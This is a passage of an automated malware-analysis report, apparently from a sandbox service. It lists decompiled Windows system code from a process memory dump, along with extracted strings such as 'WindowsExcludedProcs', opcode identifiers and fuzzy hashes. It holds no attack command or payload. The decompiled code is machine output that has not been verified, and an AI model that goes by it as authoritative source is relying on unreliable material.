                                                                                  				if(_t35 < 0) {
                                                                                  					goto L14;
                                                                                  				}
                                                                                  				E00F71293(_t79, _v40, E00F707DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                  				if(E00EC7D50() == 0) {
                                                                                  					_t48 = 0x7ffe0380;
                                                                                  				} else {
                                                                                  					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                  				}
                                                                                  				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                  					E00F6138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                  				}
                                                                                  				goto L13;
                                                                                  			}


















                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `
                                                                                  • API String ID: 0-2679148245
                                                                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                  • Instruction ID: 71ff9144c4f18473dea536153ec2c1e885f7c4207a70a42d153aa8632e41e216
                                                                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                  • Instruction Fuzzy Hash: ED31C232604345ABE710DE25CD45F9677D9AF84764F04823AF958EB2C1DA70ED14CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 72%
                                                                                  			E00F23884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr* _v16;
                                                                                  				char* _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				short _t40;
                                                                                  				short _t41;
                                                                                  				void* _t44;
                                                                                  				intOrPtr _t47;
                                                                                  				void* _t48;
                                                                                  
                                                                                  				_v16 = __edx;
                                                                                  				_t40 = 0x14;
                                                                                  				_v24 = _t40;
                                                                                  				_t41 = 0x16;
                                                                                  				_v22 = _t41;
                                                                                  				_t38 = 0;
                                                                                  				_v12 = __ecx;
                                                                                  				_push( &_v8);
                                                                                  				_push(0);
                                                                                  				_push(0);
                                                                                  				_push(2);
                                                                                  				_t43 =  &_v24;
                                                                                  				_v20 = L"BinaryName";
                                                                                  				_push( &_v24);
                                                                                  				_push(__ecx);
                                                                                  				_t47 = 0;
                                                                                  				_t48 = E00EE9650();
                                                                                  				if(_t48 >= 0) {
                                                                                  					_t48 = 0xc000090b;
                                                                                  				}
                                                                                  				if(_t48 != 0xc0000023) {
                                                                                  					_t44 = 0;
                                                                                  					L13:
                                                                                  					if(_t48 < 0) {
                                                                                  						L16:
                                                                                  						if(_t47 != 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                  						}
                                                                                  						L18:
                                                                                  						return _t48;
                                                                                  					}
                                                                                  					 *_v16 = _t38;
                                                                                  					 *_a4 = _t47;
                                                                                  					goto L18;
                                                                                  				}
                                                                                  				_t47 = L00EC4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                  				if(_t47 != 0) {
                                                                                  					_push( &_v8);
                                                                                  					_push(_v8);
                                                                                  					_push(_t47);
                                                                                  					_push(2);
                                                                                  					_push( &_v24);
                                                                                  					_push(_v12);
                                                                                  					_t48 = E00EE9650();
                                                                                  					if(_t48 < 0) {
                                                                                  						_t44 = 0;
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                  						_t48 = 0xc000090b;
                                                                                  					}
                                                                                  					_t44 = 0;
                                                                                  					if(_t48 < 0) {
                                                                                  						goto L16;
                                                                                  					} else {
                                                                                  						_t17 = _t47 + 0xc; // 0xc
                                                                                  						_t38 = _t17;
                                                                                  						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                  							_t48 = 0xc000090b;
                                                                                  						}
                                                                                  						goto L13;
                                                                                  					}
                                                                                  				}
                                                                                  				_t48 = _t48 + 0xfffffff4;
                                                                                  				goto L18;
                                                                                  			}
















                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryName
                                                                                  • API String ID: 0-215506332
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: WindowsExcludedProcs
                                                                                  • API String ID: 0-3583428290
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Actx
                                                                                  • API String ID: 0-89312691
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  • Critical error detected %lx, xrefs: 00F58E21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Critical error detected %lx
                                                                                  • API String ID: 0-802127002
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00F3FF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                  • API String ID: 0-1911121157
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%


                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 74bebc9912a198508605aa89822dd1e47226b17dd2cba998c1a28d15fd78e496
                                                                                  • Instruction ID: 350a137aca4eb0820101f9dc0df9dd936e774ff8f6e38df7cfca067d5afc5366
                                                                                  • Opcode Fuzzy Hash: 74bebc9912a198508605aa89822dd1e47226b17dd2cba998c1a28d15fd78e496
                                                                                  • Instruction Fuzzy Hash: 0D41D1B1A40318AFEB21DF14CC81FAAB7A9EB55714F1010AAEC49AB3C1D770DD81CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c52f3faa3be6236f192211741b94baacd49bf9eb4d958f4da267c5ded718bde7
                                                                                  • Instruction ID: 812854cb7ca6e0a8d99f21d9678a98b37399c72527d62f4b03d4f130516afba8
                                                                                  • Opcode Fuzzy Hash: c52f3faa3be6236f192211741b94baacd49bf9eb4d958f4da267c5ded718bde7
                                                                                  • Instruction Fuzzy Hash: A741A071E012289BDB20DF64C941FEAB7B4EF55710F0114AAE908BB381DB349E81CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9c3ec9062a4ce6f209132fc2744107a54307cb0668cc4abbde639ba4f6fefe74
                                                                                  • Instruction ID: f76940725951ef685677d722d6465223788897140728f4797cbb64bac3ad9ddf
                                                                                  • Opcode Fuzzy Hash: 9c3ec9062a4ce6f209132fc2744107a54307cb0668cc4abbde639ba4f6fefe74
                                                                                  • Instruction Fuzzy Hash: BD4154B4A0022C9BDB64DF25C9C8AEAB7F8FB54304F1055EAD919A7352DB709E80CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d0c4f7b6da127e53da167572d37024a370dbc1f47f5a32e5623bbdc09977fb80
                                                                                  • Instruction ID: 5bf9f2cd46c29847a2c048f8721cd8e02a59b788da986050ba3e7106e8719c59
                                                                                  • Opcode Fuzzy Hash: d0c4f7b6da127e53da167572d37024a370dbc1f47f5a32e5623bbdc09977fb80
                                                                                  • Instruction Fuzzy Hash: C641A8B1D01218AFDB20DFA5D841BEEBBF8EF48314F14812AE808B7251DB349906DB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f69e523735332160bd381e3ff2d9f8b9ec734b2727d13dc833ce6abb1a58c11
                                                                                  • Instruction ID: 9eaff9186169887172ccf546e1e07fca078a035dc09a2318a8204a4a381378b6
                                                                                  • Opcode Fuzzy Hash: 7f69e523735332160bd381e3ff2d9f8b9ec734b2727d13dc833ce6abb1a58c11
                                                                                  • Instruction Fuzzy Hash: 36310732652B00EBCB25AB54C881F6677B5FF10720F104A19F8552B1E1DF20FC00E6B0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f50b897b33a4018cf654ed21ffef1bdd266159860a3f59c7bc3dfceb928835f6
                                                                                  • Instruction ID: b69581771e5cde472fdfcc088ba3d57b5ce64daa3f9a7f06b33d9a2c3e6de96e
                                                                                  • Opcode Fuzzy Hash: f50b897b33a4018cf654ed21ffef1bdd266159860a3f59c7bc3dfceb928835f6
                                                                                  • Instruction Fuzzy Hash: 7431E331A04658DBD7248F3AC845ABBBBF5EF85714B15906EE849EB3A0E730DD40D790
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3053b8e0999bf16b93e56603ea983664ea80c385d7622afe0343b4f30f945229
                                                                                  • Instruction ID: 369022ba0fca1d2609b150cb0fb4f6c6cae647a28cfb49818a4114859527bda7
                                                                                  • Opcode Fuzzy Hash: 3053b8e0999bf16b93e56603ea983664ea80c385d7622afe0343b4f30f945229
                                                                                  • Instruction Fuzzy Hash: BB417C75A04209DFCB19CF58D890B99BBF2FB89304F18806AE814AB355C774AE42DB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: edb97dd3dbaaaa856384e2e87987d2da2c6e7c8561da6b0311e032ce9335f6dc
                                                                                  • Instruction ID: 21759dd71bfb0d2fd66ed1660224574b66caeb1faea7208be3db1c84178758be
                                                                                  • Opcode Fuzzy Hash: edb97dd3dbaaaa856384e2e87987d2da2c6e7c8561da6b0311e032ce9335f6dc
                                                                                  • Instruction Fuzzy Hash: B531D572A087919BC320EF28DD41A6BB3E5BFC8710F044A2DF89597691E730ED14D7A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                  • Instruction ID: 87942056267693a06383f1bbd5150a72d76b064e35f12ebaf3d81a24915f6211
                                                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                  • Instruction Fuzzy Hash: 50316872B01546AED708EBB4C981FEAF7A4BF42304F28516EE01C67202DB365A57DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f327857e751b6a94866d082dbb1abaa82a73d40b3f78a8257f42a9b3b2cf214f
                                                                                  • Instruction ID: 5bec0b5c8839b0c2ac24da3c70766fd46981406ab5776ee3e6082211bcbdde44
                                                                                  • Opcode Fuzzy Hash: f327857e751b6a94866d082dbb1abaa82a73d40b3f78a8257f42a9b3b2cf214f
                                                                                  • Instruction Fuzzy Hash: 4431BEB16283089FD721EF08DC90F5577F9EBC5714F18096BE005A7358D3B0AA02EB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 365874841ba93e06d9824edf1352cc055d3f8b86a60a99b6c9b29eec27b9b98f
                                                                                  • Instruction ID: f3990d083ba19d6a9c22ee2da647ae7cb92c15f38f091d7ce00047de43824351
                                                                                  • Opcode Fuzzy Hash: 365874841ba93e06d9824edf1352cc055d3f8b86a60a99b6c9b29eec27b9b98f
                                                                                  • Instruction Fuzzy Hash: FD318E72A097018FD320DF19C800B66B7E4FB88B14F15496EF898AB351D7B0ED45DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f1bcd2f37b1114ee4025779ab722a0edcb7ae23b37840537b830933b0c5c6b7
                                                                                  • Instruction ID: 3d1dac576970af669458dc0e71b61f3f28719c39fe4b853f7f366854e645330a
                                                                                  • Opcode Fuzzy Hash: 7f1bcd2f37b1114ee4025779ab722a0edcb7ae23b37840537b830933b0c5c6b7
                                                                                  • Instruction Fuzzy Hash: 7631D671900219ABCF10EF64CD42A7FB7F8EF04700B15406AF905EB191E734AD11DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d643a1a6527a01a2bfb7e4678a1f86aed6211a423205b1a17f50c65414f34f4f
                                                                                  • Instruction ID: bef0c30064ed06a5568de59674d029a252e6d80e50856666019804f8fc9d3686
                                                                                  • Opcode Fuzzy Hash: d643a1a6527a01a2bfb7e4678a1f86aed6211a423205b1a17f50c65414f34f4f
                                                                                  • Instruction Fuzzy Hash: 0E419EB1D0026C9FDB24CFAAD981AADFBF5FB48710F5041AEE519A7241EB705A84CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: af00b1d0a6d9ba5c78cb15a84c3456e5a809589a19daf9ac07134cb9653f05b3
                                                                                  • Instruction ID: 9c9f6cc8c663bfb83b6b6c2d68543ea38e335ac2d2d81b90995935c9bb780611
                                                                                  • Opcode Fuzzy Hash: af00b1d0a6d9ba5c78cb15a84c3456e5a809589a19daf9ac07134cb9653f05b3
                                                                                  • Instruction Fuzzy Hash: B13154322413889BCB219F16C985B6BB7E0FF85724F10203DE41A6B281DB70DC00DB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21eccb5f8908e23acf2a2cc7ef8c9ea5ffacc6c5c72b7e3a07692bd42cfe309e
                                                                                  • Instruction ID: 9ae55d3f1b1dd370b1d6ce2c4e7513c90711021391aec07a75ca712d39d18d42
                                                                                  • Opcode Fuzzy Hash: 21eccb5f8908e23acf2a2cc7ef8c9ea5ffacc6c5c72b7e3a07692bd42cfe309e
                                                                                  • Instruction Fuzzy Hash: 66319E75A14249EFD744DF18D845F9ABBE4FB09314F14925AF908DB341D631EC80DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 61db31146240e61ff61c2099f71f99ba331ca9bca0bbe47dd5b47906d796c16e
                                                                                  • Instruction ID: e20a2346f58a7b0bc1a626890f742ca6e05f59d9be422833af8cc44e73b35dff
                                                                                  • Opcode Fuzzy Hash: 61db31146240e61ff61c2099f71f99ba331ca9bca0bbe47dd5b47906d796c16e
                                                                                  • Instruction Fuzzy Hash: 3F31EC36A00619DBCB11DF98C8C17A6B3A5FB18314F16107AED48EB322FB74DD469B90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                  • Instruction ID: 85f30def735602d2125a3efed747be9e5af7f94b8a360fb138a7420ce010f76f
                                                                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                  • Instruction Fuzzy Hash: 6A218B72600118FBC724CF99CD80EABBBB9EF85744F1150AAED05A7350D630AE42DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c02d3f9f750ac4df12967a20e2278da14b37ff8edd4e89d36ed9c4d93c3e2115
                                                                                  • Instruction ID: a6e79c9d3bb0bec6955ed33de6de537352b1c0e1df1e5c1808291b8fb3f422b8
                                                                                  • Opcode Fuzzy Hash: c02d3f9f750ac4df12967a20e2278da14b37ff8edd4e89d36ed9c4d93c3e2115
                                                                                  • Instruction Fuzzy Hash: 6431F2B1A06246DFDB21DB68C488BACBBF1BB5E354F25914AD4047F252C734BD80DB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6e8402c12bd80fd38454231527094bf2d8c4bccc7392a2866bf23f789fa65437
                                                                                  • Instruction ID: a63866a433b9cc4eddd29202936f4442735568afe85a7cc542684344a5bcb8ba
                                                                                  • Opcode Fuzzy Hash: 6e8402c12bd80fd38454231527094bf2d8c4bccc7392a2866bf23f789fa65437
                                                                                  • Instruction Fuzzy Hash: F2213472041604EFC722EF28CA01F5AB7F9BF09704F04556AA149AA6A2CB35E946DB84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                  • Instruction ID: 3b632fb1e7bac75f0ae5ef78a6d3a0a01d21e464a5d8829e97ee6b515bd22a81
                                                                                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                  • Instruction Fuzzy Hash: F701D2B2140609BFD721AF26CC81E62F7ADFF443A0F004529F15463561CB22ECA1DBE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5433c46e0aa7b2e834b281084941dfa6ce0ec89bdb22e0c61d852e2a954358c7
                                                                                  • Instruction ID: 96d0b181f6219b9b7d0b8fc4490280fbe9c58beace74436fd0a0d04622a05ea3
                                                                                  • Opcode Fuzzy Hash: 5433c46e0aa7b2e834b281084941dfa6ce0ec89bdb22e0c61d852e2a954358c7
                                                                                  • Instruction Fuzzy Hash: 5C01A732A00A18EBC714EB29DC029AF77ADEFC5770F551069A915BF246DE30ED01D750
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4fdd45d21c0e3a14eb686f1d942205c28ef1befc49445923226c3525e40a3dbb
                                                                                  • Instruction ID: b2e4079e919a28dac3bec488a1be750ee4ff6beab54f90ceebe019789a5563b9
                                                                                  • Opcode Fuzzy Hash: 4fdd45d21c0e3a14eb686f1d942205c28ef1befc49445923226c3525e40a3dbb
                                                                                  • Instruction Fuzzy Hash: D60128725047419BC711EF28CD01B1A77D5BB84310F04C62AF88A93291DE34D889EB93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                  • Instruction ID: 8792b37ab0fa3e3d5f6819559a78fadd03c9a36bcb950144206482f244abfe96
                                                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                  • Instruction Fuzzy Hash: 9401DF32204A80DFD322D71CC988FB777E8EB41754F0900A1F919CBAA1D769DC40E621
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d4fe5904bc09821d2f5010874682f93a17c8711c8e2c08d3760aca273474d23
                                                                                  • Instruction ID: d37f923167fe839f0ee13c20bdd4ebcd587f46652fc54d32499feed553840ea5
                                                                                  • Opcode Fuzzy Hash: 1d4fe5904bc09821d2f5010874682f93a17c8711c8e2c08d3760aca273474d23
                                                                                  • Instruction Fuzzy Hash: 18018471E0024CABDB14DBA9D846FAFBBF8EF45710F404066F905AB291DA70DA05C795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a204bd96bce3f479fc5774021840f7937376d51d39b2404a94f6cd419107e719
                                                                                  • Instruction ID: 182ee29f2c75531aeba7a0de4d9727bbaa8ee7aa4b24b253961dac702719aa87
                                                                                  • Opcode Fuzzy Hash: a204bd96bce3f479fc5774021840f7937376d51d39b2404a94f6cd419107e719
                                                                                  • Instruction Fuzzy Hash: 2A018471E0024CABDB14DFA9D846FAEBBF8EF45710F004066F905AB291DA70D905C795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ee3977564195ff0fd58fdc81eb5de98958ecf2a37885e02f8227fc7c9e5288d4
                                                                                  • Instruction ID: a4714676254ef5bda24a6e498b6ff25bb10c77aa36892d7803038faf78763487
                                                                                  • Opcode Fuzzy Hash: ee3977564195ff0fd58fdc81eb5de98958ecf2a37885e02f8227fc7c9e5288d4
                                                                                  • Instruction Fuzzy Hash: 5D111E70E002499FDB04DFA9D545BAEBBF4FF08300F1442AAE519EB382E6349941DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5c1debd5575cfdc8c9fc29065da0ea7afe50c25308f18f0d5c60009808786086
                                                                                  • Instruction ID: d6364b8f9585be52253a5af81c3388b8c988026af55c4321538d433aa8a1ebdf
                                                                                  • Opcode Fuzzy Hash: 5c1debd5575cfdc8c9fc29065da0ea7afe50c25308f18f0d5c60009808786086
                                                                                  • Instruction Fuzzy Hash: 54011AB1A0021DAFDB00DFA9D946AAEBBF8EF48350F10405AF905F7351DA34A9018BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                  • Instruction ID: dbd8acd67d64f8ade6fe7477fc999b819602d00b9038383eaf21de9b1c5e6246
                                                                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                  • Instruction Fuzzy Hash: ADF0F233109522DBD33256554C84F57B6D58FCB750F171435F106BF744CA60AC0296F0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
